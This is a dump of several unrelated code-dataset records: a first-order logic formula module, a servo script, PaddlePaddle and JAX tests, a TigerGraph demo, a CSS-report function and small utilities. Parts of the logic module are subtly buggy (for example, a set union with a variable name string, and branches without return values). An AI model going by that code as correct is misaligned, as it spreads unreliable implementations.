self.arguments:\n constants_to_return = constants_to_return.union(argument.constants())\n return constants_to_return\n\n def variables(self) -> Set[str]:\n \"\"\"Finds all variable names in the current term.\n\n Returns:\n A set of all variable names used in the current term.\n \"\"\"\n # Task 7.6.2\n variables_to_return = set()\n if is_unary(self.root):\n variables_to_return = variables_to_return.union(self.first.variables())\n return variables_to_return\n elif is_binary(self.root):\n variables_to_return = variables_to_return.union(self.first.variables())\n variables_to_return = variables_to_return.union(self.second.variables())\n elif is_relation(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n elif is_quantifier(self.root):\n variables_to_return = variables_to_return.union(self.predicate.variables())\n variables_to_return = variables_to_return.union(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n return variables_to_return\n\n def free_variables(self) -> Set[str]:\n \"\"\"Finds all variable names that are free in the current term.\n\n Returns:\n A set of all variable names used in the current term not only\n within a scope of a quantification on those variable names.\n \"\"\"\n # Task 7.6.3\n variables_to_return = set()\n if is_unary(self.root):\n variables_to_return = variables_to_return.union(self.first.free_variables())\n return variables_to_return\n elif is_binary(self.root):\n variables_to_return = variables_to_return.union(self.first.free_variables())\n variables_to_return = variables_to_return.union(self.second.free_variables())\n elif 
is_relation(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n elif is_quantifier(self.root):\n variables_to_return = variables_to_return.union(self.predicate.free_variables())\n if self.variable in variables_to_return:\n variables_to_return.remove(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n return variables_to_return\n\n def functions(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all function names in the current term, along with their\n arities.\n\n Returns:\n A set of pairs of function name and arity (number of arguments) for\n all function names used in the current term.\n \"\"\"\n # Task 7.6.4\n functions_to_return = set()\n if is_unary(self.root):\n functions_to_return = functions_to_return.union(self.first.functions())\n return functions_to_return\n elif is_binary(self.root):\n functions_to_return = functions_to_return.union(self.first.functions())\n functions_to_return = functions_to_return.union(self.second.functions())\n elif is_relation(self.root):\n for argument in self.arguments:\n functions_to_return = functions_to_return.union(argument.functions())\n elif is_quantifier(self.root):\n functions_to_return = functions_to_return.union(self.predicate.functions())\n if self.variable in functions_to_return:\n functions_to_return.remove(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n functions_to_return = functions_to_return.union(argument.functions())\n return functions_to_return\n\n def relations(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all relation names in the current term, along with their arities.\n\n Returns:\n A set of pairs of relation name and arity (number of arguments) for\n all relation names used in the current term.\n \"\"\"\n # Task 7.6.5\n relations_to_return = set()\n if is_variable(self.root) or is_function(self.root) or is_constant(self.root):\n return relations_to_return\n elif is_relation(self.root):\n return {(self.root, len(self.arguments))}\n elif is_binary(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.first))\n relations_to_return = relations_to_return.union(Formula.relations(self.second))\n return relations_to_return\n elif is_unary(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.first))\n return relations_to_return\n elif is_quantifier(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.predicate))\n return relations_to_return\n elif is_equality(self.root):\n return relations_to_return\n else:\n raise Exception('7.6.5: Undefined action.')\n\n def substitute(self, substitution_map: Mapping[str, Term],\n forbidden_variables: AbstractSet[str] = frozenset()) -> Formula:\n \"\"\"Substitutes in the current term, each constant name `name` or free\n occurrence of variable name `name` that is a key in `substitution_map`\n with the term `substitution_map[name]`.\n\n Parameters:\n substitution_map: mapping defining the substitutions to be\n performed.\n forbidden_variables: variables not allowed in substitution terms.\n\n Returns:\n The term resulting from performing all substitutions. 
Only\n constant names and variable names originating in the current term\n are substituted (i.e., those originating in one of the specified\n substitutions are not subjected to additional substitutions).\n\n Raises:\n ForbiddenVariableError: If a term that is used in the requested\n substitution contains a variable from `forbidden_variables`\n or a variable occurrence that becomes bound when that term is\n substituted into the current term.\n\n Examples:\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,x)'), 'x': Term.parse('c')}, {'z'})\n Ay[c=plus(d,x)]\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,z)')}, {'z'})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: z\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,y)')})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: y\n \"\"\"\n for element_name in substitution_map:\n assert is_constant(element_name) or is_variable(element_name)\n for variable in forbidden_variables:\n assert is_variable(variable)\n # Task 9.2\n\n if is_quantifier(self.root):\n quantifier, variable, predicate = self.root, self.variable, self.predicate\n substitution_map = {k: v for k, v in substitution_map.items() if k != variable}\n\n new_forbidden = set([v for v in forbidden_variables] + [self.variable])\n\n return Formula(\n root=quantifier,\n arguments_or_first_or_variable=variable,\n second_or_predicate=predicate.substitute(substitution_map, new_forbidden))\n\n elif is_binary(self.root):\n operator, first, second = self.root, self.first, self.second\n return Formula(\n root=operator,\n arguments_or_first_or_variable=first.substitute(substitution_map, forbidden_variables),\n second_or_predicate=second.substitute(substitution_map, forbidden_variables))\n\n elif is_unary(self.root):\n operator, first = self.root, self.first\n return Formula(\n root=operator,\n arguments_or_first_or_variable=first.substitute(substitution_map, forbidden_variables))\n\n elif is_equality(self.root):\n operator, first, second = self.root, self.arguments[0], self.arguments[1]\n return Formula(\n root=operator,\n arguments_or_first_or_variable=[first.substitute(substitution_map, forbidden_variables),\n second.substitute(substitution_map, forbidden_variables)])\n\n elif is_relation(self.root):\n if self.root in substitution_map.keys():\n relation = substitution_map[self.root]\n else:\n relation = self.root\n new_arguments_list = []\n for arg in self.arguments:\n new_arguments_list.append(arg.substitute(substitution_map, forbidden_variables))\n return Formula(\n root=relation,\n arguments_or_first_or_variable=new_arguments_list)\n\n else:\n assert ()\n\n def _check_forbidden_vars(self, term: Term, forbidden_variables: AbstractSet[str] = frozenset()) -> Term:\n \"\"\"Helper for substitute. Throws the exception if needed.\"\"\"\n for forbidden_var in forbidden_variables:\n if forbidden_var in self.variables() or forbidden_var in term.variables():\n raise ForbiddenVariableError(forbidden_var)\n return term\n\n def propositional_skeleton(self) -> Tuple[PropositionalFormula,\n Mapping[str, Formula]]:\n \"\"\"Computes a propositional skeleton of the current term.\n\n Returns:\n A pair. 
The first element of the pair is a propositional term\n obtained from the current term by substituting every (outermost)\n subformula that has a relation or quantifier at its root with an\n atomic propositional term, consistently such that multiple equal\n such (outermost) subformulas are substituted with the same atomic\n propositional term. The atomic propositional formulas used for\n substitution are obtained, from left to right, by calling\n `next`\\ ``(``\\ `~logic_utils.fresh_variable_name_generator`\\ ``)``.\n The second element of the pair is a map from each atomic\n propositional term to the subformula for which it was\n substituted.\n \"\"\"\n # Task 9.8\n formula = Formula.parse(str(self))\n map_to_return = {}\n\n if is_unary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in return_map.items()}\n form = PropositionalFormula(self.root, first)\n return PropositionalFormula.parse(str(form)), map_to_return\n\n if is_binary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n second, return_map = self.second.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in return_map.items()}\n form = PropositionalFormula(self.root, first, second)\n return PropositionalFormula.parse(str(form)), map_to_return\n\n else:\n formula, map_to_return = formula.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in map_to_return.items()}\n return PropositionalFormula.parse(str(formula)), map_to_return\n\n def __helper_to_propositional_skeleton(self, map_to_return):\n if is_constant(self.root) or is_variable(self.root):\n return PropositionalFormula(self.root), map_to_return\n\n elif is_unary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n form = PropositionalFormula(self.root, first)\n return form, map_to_return\n\n elif is_binary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n second, return_map = self.second.__helper_to_propositional_skeleton(map_to_return)\n form = PropositionalFormula(self.root, first, second)\n return form, map_to_return\n\n elif is_relation(self.root) or is_equality(self.root) or is_quantifier(self.root) or is_function(self.root):\n if self in map_to_return:\n return PropositionalFormula(str(map_to_return[self])), map_to_return\n var = Term(next(fresh_variable_name_generator))\n map_to_return[self] = var\n return PropositionalFormula(str(var)), map_to_return\n\n @staticmethod\n def from_propositional_skeleton(skeleton: PropositionalFormula,\n substitution_map: Mapping[str, Formula]) -> \\\n Formula:\n \"\"\"Computes a first-order term from a propositional skeleton and a\n substitution map.\n\n Arguments:\n skeleton: propositional skeleton for the term to compute.\n substitution_map: a map from each atomic propositional subformula\n of the given skeleton to a first-order term.\n\n Returns:\n A first-order term obtained from the given propositional skeleton\n by substituting each atomic propositional subformula with the term\n mapped to it by the given map.\n \"\"\"\n for key in substitution_map:\n assert is_propositional_variable(key)\n # Task 9.10\n formula = Formula.__helper_to_from_propositional_skeleton(skeleton, substitution_map)\n return Formula.parse(str(formula))\n\n @staticmethod\n def __helper_to_from_propositional_skeleton(skeleton, substitution_map):\n if 
is_constant(skeleton.root) or is_variable(skeleton.root):\n if skeleton.root in substitution_map:\n return substitution_map[skeleton.root]\n\n elif is_unary(skeleton.root):\n first = Formula.__helper_to_from_propositional_skeleton(skeleton.first, substitution_map)\n form = Formula(skeleton.root, first)\n return form\n\n elif is_binary(skeleton.root):\n first = Formula.__helper_to_from_propositional_skeleton(skeleton.first, substitution_map)\n second = Formula.__helper_to_from_propositional_skeleton(skeleton.second, substitution_map)\n form = Formula(skeleton.root, first, second)\n return form\n","sub_path":"ex12/code/predicates/syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":41611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600218318","text":"import RPi.GPIO as GPIO\nimport smbus\nimport sys\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\ndef moveServo(y):\n\tservo = 35;\n\tfrequency = 200;\n\n\tGPIO.setup(servo, GPIO.OUT);\n\n\tpwm = GPIO.PWM(servo, frequency);\n\n\tPos = 1.22 + ((float(y)) * .0075)\n\n\tmsPerCycle = 1000 / frequency;\n\n\tdutyCycle = Pos * 100 / msPerCycle;\n\tpwm.start(dutyCycle);\n\ttime.sleep(2);\n\tpwm.stop()\n\tGPIO.cleanup()\n\nif __name__ == '__main__':\n\tmoveServo(sys.argv[1]);\n","sub_path":"middle.py","file_name":"middle.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539379597","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n\"\"\"\ntest_Tensor_repeat_interleave\n\"\"\"\n\nfrom apibase import APIBase\nfrom apibase import randtool\nimport paddle\nimport pytest\nimport numpy as np\n\n\nclass TestRepeatInterleave(APIBase):\n \"\"\"\n test\n \"\"\"\n\n def hook(self):\n \"\"\"\n implement\n \"\"\"\n self.types = [np.float32, np.float64]\n # self.debug = True\n # self.static = False\n # enable check grad\n # self.enable_backward = False\n # self.delta = 1e-5\n\n\nobj = TestRepeatInterleave(paddle.Tensor.repeat_interleave)\n\n\n@pytest.mark.api_base_repeat_interleave_vartype\ndef test_repeat_interleave_base():\n \"\"\"\n base\n \"\"\"\n x = randtool(\"float\", 0, 1, (4,))\n res = np.repeat(x, 3)\n obj.base(res=res, x=x, repeats=3)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave0():\n \"\"\"\n x: 2d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave1():\n \"\"\"\n x: 3d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave2():\n \"\"\"\n x: 4d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4, 5))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave3():\n \"\"\"\n x: 5d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave4():\n \"\"\"\n x: 5d-tensor\n axis = 1\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2, axis=1)\n obj.run(res=res, x=x, repeats=2, axis=1)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef 
test_repeat_interleave5():\n \"\"\"\n x: 5d-tensor\n axis = 3\n type: int\n \"\"\"\n obj.types = [np.int32, np.int64]\n obj.enable_backward = False\n x = randtool(\"int\", -2, 2, (4, 2, 4, 4, 5))\n res = np.repeat(x, 2, axis=3)\n obj.run(res=res, x=x, repeats=2, axis=3)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave6():\n \"\"\"\n x: 5d-tensor\n axis = 2\n type: int\n repeats:Tensor\n \"\"\"\n obj1 = TestRepeatInterleave(paddle.repeat_interleave)\n obj1.types = [np.int32, np.int64]\n obj1.enable_backward = False\n x = randtool(\"int\", -2, 2, (4, 2, 4, 4, 5))\n repeat = np.array([2, 4], dtype=np.int64)\n res = np.repeat(x, repeat, axis=1)\n obj1.run(res=res, x=x, repeats=repeat, axis=1)\n","sub_path":"framework/api/paddlebase/test_Tensor_repeat_interleave.py","file_name":"test_Tensor_repeat_interleave.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119620995","text":"# Debug function\ndef cssInfoDump(cssObjects,urlParts,path):\n fo = open(path+urlParts.hostname+'/'+'output.html',\"wb\")\n wrap = '''\n
    \n Not Used\n    \n Used\n    \n Found in JavaScript File\n    *\n    \n\n    \n\n    \n {}\n\n    \n\n    \n {}\n\n    \n\n '''\n info = '''\n\n    \n {}\n\n    \n '''\n fileWrap = '''\n\n    \n\n\n    {}\n\n    \n\n    \n \n\n    \n\n    \n \n\n    \n {}\n\n    \n '''\n deadFileWrap = '''\n\n    \n\n\n    {}\n\n    \n {}\n\n    \n '''\n\n files = ''\n content = ''\n for css in cssObjects:\n\n\n pinfo = '\n\n    Pages using this style sheet\n\n      '\n for page in css.pageObjects:\n if page.url=='' or page.url==None:\n continue\n pinfo+= '\n    • '+page.url+'\n    • '\n pinfo +='
    '\n\n tagDiv = ''\n for tag in css.tagObjects:\n if len(tag.tags)==0 or tag.properties==None or len(tag.tagsFound)==0:\n continue\n tagDiv += tag.printUsed() \n tagDiv += tag.printProperties()\n\n\n\n if not css.fileExists:\n tagDiv = ''\n files+= deadFileWrap.format(css.path,pinfo)\n else:\n files+= fileWrap.format(css.path,pinfo) \n \n content+= info.format(tagDiv)\n\n fo.write(wrap.format(files,content))\n fo.close()\n\n","sub_path":"codebase/classes/PagePrinter.py","file_name":"PagePrinter.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27374309","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*\n\n\"\"\"DBPedia TitleFile Splitter\n\nSplit the file with titles as wiki IDs into lots of smaller files to help speed up processing in the next step\nSaves the result in the files in /WikiCat/Data/splitIDFiles/\n\nAdapted from https://stackoverflow.com/questions/546508/how-can-i-split-a-file-in-python\n\"\"\"\n\n# 10,000 lines per file\nsplitLen = 10000\noutputBase = 'titleLinks'\n\ninput = open('../Data/titleLinks.csv', 'r')\n\ncount = 0\nat = 0\ndest = None\nfor line in input:\n if count % splitLen == 0:\n if dest: dest.close()\n dest = open(outputBase + str(at) + '.csv', 'w')\n at += 1\n dest.write(line)\n count += 1\n","sub_path":"BiographyCorpus/Scripts/SplitIDs.py","file_name":"SplitIDs.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553449238","text":"import unittest\n\nimport jax.random as jrandom\nfrom jaxchem.models import GCNPredicator\n\n\n# params\nHIDDEN_FEATS = [64, 32, 16]\nPOOLING_METHOD = 'mean'\nPREDICATOR_HIDDEN_FEATS = 16\nN_OUT = 1\nBATCH_SIZE = 32\nMAX_NODE_SIZE = 30\nNODE_FEATURE_DIM = 64\n\n\nclass TestGCNPredicator(unittest.TestCase):\n \"\"\"Test GCNPredicator\"\"\"\n\n def setup_method(self, method):\n self.key = jrandom.PRNGKey(1234)\n self.input_data = self.__setup_data()\n self.models_fun = GCNPredicator(hidden_feats=HIDDEN_FEATS, pooling_method=POOLING_METHOD,\n predicator_hidden_feats=PREDICATOR_HIDDEN_FEATS,\n n_out=N_OUT)\n\n def __setup_data(self):\n self.key, k1, k2, k3 = jrandom.split(self.key, 4)\n batched_node_feats = jrandom.normal(k1, (BATCH_SIZE, MAX_NODE_SIZE, NODE_FEATURE_DIM))\n batched_adj = jrandom.normal(k2, (BATCH_SIZE, MAX_NODE_SIZE, MAX_NODE_SIZE))\n return (batched_node_feats, batched_adj, k3, True)\n\n def test_forward_shape(self):\n \"\"\"Test output shape of GCNPredicator\"\"\"\n init_fun, predict_fun = self.models_fun\n out_shape, params = init_fun(self.key, self.input_data[0].shape)\n preds = predict_fun(params, *self.input_data)\n assert preds.shape == out_shape\n assert preds.shape == (BATCH_SIZE, N_OUT)\n","sub_path":"tests/models/gcn/test_gcn_predicator.py","file_name":"test_gcn_predicator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14621885","text":"\"\"\"\n * Copyright 2020-2021 Xilinx, Inc.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either 
express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n\"\"\"\n\nimport time\nimport random as rand\nfrom pathlib import Path, PurePosixPath\nimport pyTigerGraph as tg\nimport os\n\n# Login Setup\nhostName = \"localhost\" # TG server hostname\nuserName = \"tigergraph\" # TG user name\npassWord = \"tigergraph\" # TG password\n\nloadGraph = True\nloadCache = True\nloadFPGA = True\n\npopulationSize = 1000 # Size of the total patient population\ntopK = 10 # Number of highest scoring patient matches\nnumDevices = 1 # Number of FPGA devices to distribute the queries to\n\n# Path Setup\nnotebookLocation = Path(os.getcwd() + \"/..\")\nqueryFileLocation = notebookLocation / \"query\"\n\nserverInstallLocation = PurePosixPath(\"/opt/xilinx/apps/graphanalytics/integration/Tigergraph-3.x/1.1/examples/synthea\")\nserverDataLocation = serverInstallLocation / \"1000_patients/csv\"\n\n# Utility Methods\ndef getPatient(id):\n patientList = conn.getVerticesById('patients', id)\n return [] if len(patientList) == 0 else patientList[0]\n\ndef getPatientName(patient):\n return patient['attributes']['FIRST_NAME'] + ' ' + patient['attributes']['LAST_NAME']\n\ndef printResults(result, newPatient):\n matches = result[0]['Matches']\n print(f'Matches for patient {getPatientName(newPatient)}')\n for m in matches:\n matchingPatient = getPatient(m['Id'])\n print(f'{m[\"score\"]} {getPatientName(matchingPatient)}')\n\nif __name__ == '__main__':\n\n\tif loadGraph:\n\t\t# Create New Graph\n\t\t# connect to TG server and create graph\n\t\tgraphName = f'xgraph_{userName}_{populationSize}' # TG graph name\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname='', username=userName, password=passWord, useCert=False)\n\t\tprint(\"\\n--------- Creating New graph ----------\")\n\t\tprint(conn.gsql(f'create graph {graphName}()', options=[]))\n\n\t\t# connect to TG server with new graph\n\t\tprint(f'Using graph {graphName}')\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname=graphName, username=userName, password=passWord, useCert=False)\n\t\t\n\t\t# Create Graph Schema\n\t\tprint(\"\\n--------- Creating New Schema ----------\")\n\t\tschemaFile = queryFileLocation / \"schema_xgraph.gsql\"\n\n\t\twith open(schemaFile) as fh:\n\t\t\tqStrRaw = fh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\t\n\t\t\n\t\t# Load graph data\n\t\tprint(\"\\n--------- Loading data into graph ----------\")\n\t\tloadFile = queryFileLocation / \"load_xgraph.gsql\"\n\n\t\twith open(loadFile) as fh:\n\t\t\tqStrRaw = fh.read()\n\t\t\tqStrRaw = qStrRaw.replace('@graph', graphName)\n\t\t\tqStr = qStrRaw.replace('$sys.data_root', str(serverDataLocation))\n\t\t\tprint(conn.gsql(qStr, options=[]))\n\t\t\tprint(conn.gsql(f\"USE GRAPH {graphName}\\n RUN LOADING JOB load_xgraph\"))\n\t\t\tprint(conn.gsql(f\"USE GRAPH {graphName}\\n DROP JOB load_xgraph\"))\n\t\t\t\n\t\t\n\t\t# Install Queries\n\t\tprint(\"\\n--------- Installing Queries ----------\")\n\t\tbaseQFile = queryFileLocation / \"base.gsql\"\n\t\tclientQFile = queryFileLocation / \"client.gsql\"\n\n\t\twith open(baseQFile) as bfh, open(clientQFile) as cfh:\n\t\t\tprint(\"installing base queries ...\")\n\t\t\tqStrRaw = bfh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\t\n\t\t\tprint(\"\\ninstalling client queries ...\")\n\t\t\tqStrRaw = cfh.read()\n\t\t\tqStr = qStrRaw.replace('@graph', 
graphName)\n\t\t\tprint(conn.gsql(qStr))\n\t\t\n\telse:\n\t\t# connect to TG server with existing graph\n\t\tprint(f'Using graph {graphName}')\n\t\tconn = tg.TigerGraphConnection(host='http://' + hostName, graphname=graphName, username=userName, password=passWord, gsqlVersion='3.1.1')\n\t\tprint(f'Found graph {graphName}')\n\t\n\t\n\t# Create Embeddings\n\tif loadCache or loadGraph:\n\t\tprint('Creating patient embeddings and storing them in patient vertices...')\n\t\ttStart = time.perf_counter()\n\t\tconn.runInstalledQuery('client_cosinesim_embed_vectors', timeout=240000000)\n\t\tconn.runInstalledQuery('client_cosinesim_embed_normals', timeout=240000000)\n\t\tprint(f'completed in {time.perf_counter() - tStart:.4f} sec')\n\t\t\n\n\t# Send embeddings to FPGA\n\tif loadFPGA or loadGraph:\n\t\tprint('Loading data into FPGA memory...')\n\t\tconn.runInstalledQuery('client_cosinesim_set_num_devices', {'numDevices': numDevices}, timeout=240000000)\n\t\ttStart = time.perf_counter()\n\t\tresultHwLoad = conn.runInstalledQuery('client_cosinesim_load_alveo', timeout=240000000)\n\t\tprint(f'completed in {time.perf_counter() - tStart:.4f} sec\\n')\n\t\n\t\n\t# Check status\n\tstatus = conn.runInstalledQuery('client_cosinesim_get_alveo_status', timeout=240000000)\n\tisInit = status[0][\"IsInitialized\"]\n\tnumDev = status[0][\"NumDevices\"]\n\tprint(f'FPGA Init: {isInit}, Dev: {numDev}\\n')\n\t\n\t# Compute Cosine Similarity\n\tprint('Running Query...')\n\t# pick a random patient out of 100\n\ttargetPatients = conn.getVertices('patients', limit=100)\n\ttargetPatient = targetPatients[rand.randint(0,99)]\n\n\t# run similarity on the choosen patient\n\tresultHW = conn.runInstalledQuery('client_cosinesim_match_alveo',\n\t\t\t\t\t\t\t\t\t {'newPatient': targetPatient['v_id'], 'topK': topK}, timeout=240000000)\n\t\t\t\t\t\t\t\t\t \n\tprintResults(resultHW, targetPatient)\n\tresHWTime = resultHW[0][\"ExecTimeInMs\"]\n\tprint(f'\\nQuery completed in {resHWTime:.2f} msec')\n","sub_path":"plugin/tigergraph/recomengine/examples/synthea/python/TG_demo.py","file_name":"TG_demo.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415102905","text":"import argparse\nimport numpy as np\nimport os\nimport pdb\nimport sys\n\n\n\"\"\"Runs eval on specified model, and prints output to console.\n\n Takes model name as command line argument. e.g.\n python eval_short_panels.py \"MODEL_NAME\"\n\n Valid model names are defined in run_short_pane.sh, and are as follows:\n ['ce_iw', 'ce_sn', 'ce_miw',\n 'mmd_iw', 'mmd_sn', 'mmd_miw',\n 'cgan', 'upsample']\n\n\"\"\"\n\nmodel_name = sys.argv[1]\n#base_path = '/home/maurice/iwgn_multivariate/results_20runs' # Used in paper\nbase_path = '/home/maurice/iwgn_multivariate/results'\nmodel_run_names = [n for n in os.listdir(base_path) if model_name in n]\n\nFIXED_DIM_CHOICES = [2, 4, 10] # Defined by generative scripts.\n\nprint('Results: {}'.format(model_name))\nfor dim in FIXED_DIM_CHOICES:\n model_dim_combo = '{}_dim{}'.format(model_name, dim)\n # Fetch only runs for that model and dim.\n # e.g. 
checking if the identifier \"ce_iw_dim2\" is in \"ce_iw_dim2_run5\".\n runs = [name for name in model_run_names if model_dim_combo in name]\n mmd_run_means = []\n energy_run_means = []\n kl_run_means = []\n for run in runs:\n tail = 5\n # Fetch and store MMD results.\n mmd_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_mmd.txt'))\n mmd_run_scores_not_nan = mmd_run_scores_all[~np.isnan(mmd_run_scores_all)]\n mmd_run_scores = mmd_run_scores_not_nan[-10:]\n mmd_run_means.append(np.mean(mmd_run_scores))\n # Fetch and store energy results.\n energy_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_energy.txt'))\n energy_run_scores_not_nan = energy_run_scores_all[~np.isnan(energy_run_scores_all)]\n energy_run_scores = energy_run_scores_not_nan[-tail:]\n energy_run_means.append(np.mean(energy_run_scores))\n # Fetch and store KL results.\n kl_run_scores_all = np.loadtxt(os.path.join(base_path, run, 'scores_kl.txt'))\n kl_run_scores_not_nan = kl_run_scores_all[~np.isnan(kl_run_scores_all)]\n kl_run_scores = kl_run_scores_not_nan[-tail:]\n kl_run_means.append(np.mean(kl_run_scores))\n\n\n # Print summary statistic for the multiple runs of each experiment.\n # PRINT MEAN RESULTS\n type_to_report = 'min' # ['mean', 'min']\n if type_to_report == 'mean':\n print((' {} (n={}) MEAN: MMD {:.4f} +- {:.4f}, E: {:.4f} +- {:.4f}, '\n 'KL: {:.4f} +- {:.4f}').format(\n model_dim_combo, len(mmd_run_means),\n np.mean(mmd_run_means), np.std(mmd_run_means),\n np.mean(energy_run_means), np.std(energy_run_means),\n np.mean(kl_run_means), np.std(kl_run_means)))\n elif type_to_report == 'min':\n print((' {} (n={}) MIN: MMD {:.4f},{:.4f}, E: {:.4f},{:.4f}, '\n 'KL: {:.4f},{:.4f}').format(\n model_dim_combo, len(mmd_run_means),\n np.min(mmd_run_means), np.std(mmd_run_means),\n np.min(energy_run_means), np.std(energy_run_means),\n np.min(kl_run_means), np.std(kl_run_means)))\nprint\n","sub_path":"eval_short_panel.py","file_name":"eval_short_panel.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561417591","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('message', '0005_shorturl'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='wasa2il_usage',\n field=models.CharField(default=b'any', max_length=12, choices=[(b'any', b'Does not matter'), (b'are_users', b'Recipients are wasa2il users'), (b'not_users', b'Recipients are not wasa2il users')]),\n ),\n ]\n","sub_path":"message/migrations/0006_message_wasa2il_usage.py","file_name":"0006_message_wasa2il_usage.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598440270","text":"from app.api import bp\nfrom app.models import Product\nfrom flask import jsonify, request\nfrom ..utils import helpers, constants\nfrom app.inventory import update as uinventory\n\n\ndef is_product_exist_response(pid, exist):\n if exist:\n status = constants.REST_API_SUCCESS\n message = constants.REST_API_PRODUCT_EXIST_MESSAGE.format(pid)\n else:\n status = constants.REST_API_ERROR\n message = constants.REST_API_PRODUCT_NOT_EXIST_MESSAGE.format(pid)\n\n return jsonify({\n constants.REST_API_STATUS: status,\n constants.REST_API_DATA:{\n constants.REST_API_PID: pid,\n constants.REST_API_EXISTS: exist\n },\n 
